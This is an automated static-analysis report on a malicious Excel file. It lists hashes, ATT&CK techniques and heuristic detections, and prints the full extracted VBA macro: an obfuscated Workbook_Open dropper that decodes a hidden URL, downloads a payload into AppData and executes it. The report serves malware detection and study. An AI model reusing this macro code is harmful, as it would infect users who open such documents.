Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebd4be279ffeac60…

MALICIOUS

Office (OLE)

69.5 KB Created: 2020-05-09 08:46:00 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 58a8b51e7c69f75f563747eae7bc12fb SHA-1: 552c271a2f3457ea137cc52d669b2ff0b256741b SHA-256: ebd4be279ffeac609946977cd38d51331cad3238e36185828c183154f5e03f8f
276 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an Excel file containing a Workbook_Open VBA macro that utilizes the URLDownloadToFile API to download a second-stage payload. The macro attempts to save the payload to the AppData directory. The presence of the Workbook_Open macro and the use of URLDownloadToFile are strong indicators of a downloader or dropper functionality.

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-7783762-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7783762-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _
    ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk")
    acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10212 bytes
SHA-256: 1208bb92161f3d36c2bdc2f31280b7cd5b5e637472b7227dd4e076725e1b839a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Bil()

End Sub

Attribute VB_Name = "YufjTbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function EPSiDEOXSw Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal EqRoAOwNzDe As Long, ByVal RPJcYvRqvsDGVrsBLGkzSm As String, _
ByVal FApUefdiSLTxKJ As String, ByVal ZegXxMEpWYtVbpzThUHi As String, ByVal EDgMe As String, ByVal QUuUgZspLiGyuGWmHvEcW As Long) As Long

Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _
ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long

Sub DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX()
Dim EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As String
Dim VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As String
Dim acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH As String
Dim RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs As String
Dim WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae As String
Dim QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG As String
VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk")
acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb


EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV = Decrypt("fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui")

BmtAQrrGwzrPtXVDsM 0, EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV, acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, 0, 0
EPSiDEOXSw 0, "open", acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, "", vbNullString, vbNormalFocus
End Sub




Sub Workbook_Open()

DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX
End Sub


Public Function mutiqueshed(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1ababb648e22b16fdc57d3 As Double
be3a8c1f30f1ababb648e22b16fdc57d3 = 242.162
Dim columnwall As Byte
columnwall = 114.429
Dim t0ea0a0840384a15e019665b2e996b72f As Long
t0ea0a0840384a15e019665b2e996b72f = 184.954
Dim n2b549c2e42dc58d564726b5780212aba As Double
n2b549c2e42dc58d564726b5780212aba = 185.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fcabf21f As String
m974e3e334b64ac13b6dec997fcabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd15305c As Boolean
z2c55929d38494d4bf3ab6ba3dd15305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fbc0 As Double
b9d76f7072ca3da29e82e55579143fbc0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function

Private Function Decrypt(enc)
    Dim x, v, AppData
    enc = StrReverse(enc)
    For v = 1 To Len(enc)
        x = Mid(enc, v, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    Decrypt = AppData
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore__t236yey
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' 	FuncDefn (Sub RPJcYvRqvsDGVrsBLGkzSm())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/YufjTbook - 6404 bytes
' Line #0:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function ZegXxMEpWYtVbpzThUHi Lib "OZfcnEFbclJqTjPVpxnSNOMR" (ByVal EDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal shell32.dll As String, ByVal BmtAQrrGwzrPtXVDsM As String, ByVal DuHRBAooPXkMgLjBNBz As String, ByVal tLIf As Long) As Long)
' Line #1:
' Line #2:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function CvChH Lib "acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH" (ByVal tJNPHhJoYTIdTKXjRQ As Long, ByVal urlmon As String, ByVal DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX As String, ByVal EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As Long, ByVal VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As Long) As Long)
' Line #3:
' Line #4:
' 	FuncDefn (Sub RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs())
' Line #5:
' 	Dim 
' 	VarDefn WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae (As String)
' Line #6:
' 	Dim 
' 	VarDefn QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG (As String)
' Line #7:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #8:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #9:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #10:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #11:
' 	LitStr 0x0008 "fyf/sskk"
' 	ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001 
' 	St QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG 
' Line #12:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd mutiqueshed$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG 
' 	Concat 
' 	St Decrypt 
' Line #13:
' Line #14:
' Line #15:
' 	LitStr 0x0038 "fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui"
' 	ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001 
' 	St WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae 
' Line #16:
' Line #17:
' 	LitDI2 0x0000 
' 	Ld WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall CvChH 0x0005 
' Line #18:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld burgerorgan 
' 	Ld bonusshoot 
' 	ArgsCall ZegXxMEpWYtVbpzThUHi 0x0006 
' Line #19:
' 	EndSub 
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' 	FuncDefn (Sub id_0296())
' Line #25:
' Line #26:
' 	ArgsCall RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs 0x0000 
' Line #27:
' 	EndSub 
' Line #28:
' Line #29:
' Line #30:
' 	FuncDefn (Public Function be3a8c1f30f1ababb648e22b16fdc57d3(columnwall, t0ea0a0840384a15e019665b2e996b72f, id_FFFE As Variant))
' Line #31:
' 	LitStr 0x0001 "*"
' 	Ld columnwall 
' 	Concat 
' 	LitStr 0x0001 "*"
' 	Concat 
' 	St n2b549c2e42dc58d564726b5780212aba 
' Line #32:
' 	Dim 
' 	VarDefn dhmpmrvyvrxwv (As Double)
' Line #33:
' 	LitR8 0xBE77 0x1A9F 0x452F 0x406E 
' 	St dhmpmrvyvrxwv 
' Line #34:
' 	Dim 
' 	VarDefn m974e3e334b64ac13b6dec997fcabf21f (As Byte)
' Line #35:
' 	LitR8 0x7EFA 0xBC6A 0x9B74 0x405C 
' 	St m974e3e334b64ac13b6dec997fcabf21f 
' Line #36:
' 	Dim 
' 	VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #37:
' 	LitR8 0x0C4A 0x2B02 0x1E87 0x4067 
' 	St b08576ffe41cb67690655f1261f410844 
' Line #38:
' 	Dim 
' 	VarDefn z2c55929d38494d4bf3ab6ba3dd15305c (As Double)
' Line #39:
' 	LitR8 0xE148 0x147A 0x23AE 0x4067 
' 	St z2c55929d38494d4bf3ab6ba3dd15305c 
' Line #40:
' 	LitStr 0x0000 ""
' 	St b9d76f7072ca3da29e82e55579143fbc0 
' Line #41:
' 	Dim 
' 	VarDefn kqeepfyakmzwuediw (As String)
' Line #42:
' 	LitStr 0x000B "naiveremove"
' 	St kqeepfyakmzwuediw 
' Line #43:
' 	Dim 
' 	VarDefn flamesight (As Byte)
' Line #44:
' 	LitR8 0x3127 0xAC08 0x3A1C 0x4033 
' 	St flamesight 
' Line #45:
' 	Dim 
' 	VarDefn sweartrust (As Boolean)
' Line #46:
' 	LitR8 0xE560 0x22D0 0x79DB 0x4057 
' 	St sweartrust 
' Line #47:
' 	Dim 
' 	VarDefn prqhhqrabc (As Double)
' Line #48:
' 	LitR8 0x7CEE 0x353F 0x2A5E 0x405B 
' 	St prqhhqrabc 
' Line #49:
' 	Ld t0ea0a0840384a15e019665b2e996b72f 
' 	Ld n2b549c2e42dc58d564726b5780212aba 
' 	Like 
' 	Not 
' 	IfBlock 
' Line #50:
' 	Ld columnwall 
' 	St b9d76f7072ca3da29e82e55579143fbc0 
' Line #51:
' 	Dim 
' 	VarDefn enc (As Double)
' Line #52:
' 	LitR8 0x2B02 0x1687 0xBED9 0x404E 
' 	St enc 
' Line #53:
' 	Ld enc 
' 	LitR8 0xD2F2 0x624D 0xA810 0x4067 
' 	Ne 
' 	IfBlock 
' Line #54:
' 	Dim 
' 	VarDefn x (As Byte)
' Line #55:
' 	LitR8 0xDD2F 0x0624 0x9981 0x406A 
' 	St x 
' Line #56:
' 	Dim 
' 	VarDefn v (As Long)
' Line #57:
' 	LitR8 0xAC08 0x5A1C 0x7F64 0x406D 
' 	St v 
' Line #58:
' 	Dim 
' 	VarDefn AppData (As String)
' Line #59:
' 	LitStr 0x000C "fadzjgdilazu"
' 	St AppData 
' Line #60:
' 	EndIfBlock 
' Line #61:
' 	EndFunc 
' Line #62:
' Line #63:
' 	FuncDefn (Private Function UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open(StrReverse, id_FFFE As Variant))
' Line #64:
' 	Dim 
' 	VarDefn Chr
' 	VarDefn Asc
' 	VarDefn Sheet1
' Line #65:
' 	Ld StrReverse 
' 	ArgsLd Sheet2 0x0001 
' 	St StrReverse 
' Line #66:
' 	StartForVariable 
' 	Ld Asc 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StrReverse 
' 	FnLen 
' 	For 
' Line #67:
' 	Ld StrReverse 
' 	Ld Asc 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St Chr 
' Line #68:
' 	Ld Sheet1 
' 	Ld Chr 
' 	ArgsLd Workbook 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Sheet3 0x0001 
' 	Concat 
' 	St Sheet1 
' Line #69:
' 	StartForVariable 
' 	Next 
' Line #70:
' 	Ld Sheet1 
' 	St UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 
' Line #71:
' 	EndFunc 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes